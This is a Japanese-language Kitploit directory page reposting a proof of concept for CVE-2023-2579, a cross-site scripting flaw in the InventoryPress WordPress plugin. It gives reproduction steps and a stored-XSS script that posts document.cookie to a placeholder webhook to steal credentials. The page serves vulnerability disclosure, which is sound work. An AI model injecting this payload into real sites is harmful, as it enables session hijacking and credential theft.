Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
poc-cve-xss-inventory-press-plugin — CVE-2023-2579 の PoC | Kitploit
ツール/GitHubGitHub/0xn4d/poc-cve-xss-inventory-press-plugin
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテストペイロード開発
GitHub0xn4d/poc-cve-xss-inventory-press-plugin

poc-cve-xss-inventory-press-plugin

CVE-2023-2579 の PoC

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
13年前未レビュー

更新 - 6-23-2023

CVE-2023-2579 ID が予約され、PoC が WPScan ウェブサイトで公開されました: https://wpscan.com/vulnerability/3cfcb8cc-9c4f-409c-934f-9f3f043de6fe

詳細

タイトル: WordPress CMS 用 InventoryPress プラグインにおける認証済み反射型クロスサイトスクリプティング
日付: 2023-04-21
著者: Danilo Albuquerque
ベンダーホームページ: https://wordpress.org
ソフトウェアリンク: https://wordpress.org/download
バージョン: WordPress 6.2
プラグイン名とバージョン: InventoryPress 1.7
テスト環境: Brave (バージョン 1.50.119 Chromium: 112.0.5615.121 (公式ビルド) 64ビット)

InventoryPress 1.7 の反射型XSS脆弱性のPoC

  1. 在庫にアイテムを追加できるページに移動します。
  2. フォームの「説明」入力欄に悪意のあるペイロードを追加します。
  3. プラグインによって生成された新しいアイテムのリンクにアクセスします。

これらすべてを行い、現在のページを更新すると、メッセージを含むアラートポップアップが表示されます。

以下スクリーンショット

  1. 在庫にアイテムを追加できるページに移動します:
    画像

  2. フォームの「説明」入力欄に悪意のあるペイロードを追加します:
    画像

  3. プラグインによって生成された新しいアイテムのリンクにアクセスします:
    画像

  4. リクエストが完了すると、アラートポップアップが表示されます:
    画像

おまけ - Stored XSS のPoC

  1. 以下のペイロードを「説明」入力欄に追加してクッキーを盗みます: <script>fetch('https://webhooksite-to-get-the-request', {method: 'POST',mode: 'no-cors',body:document.cookie});</script>。その後、新しいアイテムを投稿するか、既存のアイテムを更新します。

  2. Webhook サイトでトリガーし、認証情報を取得します。

  3. ペイロードを追加し、アイテムを投稿(または更新)します: 画像

  4. トリガーと認証情報の取得: 画像

ツールをダウンロード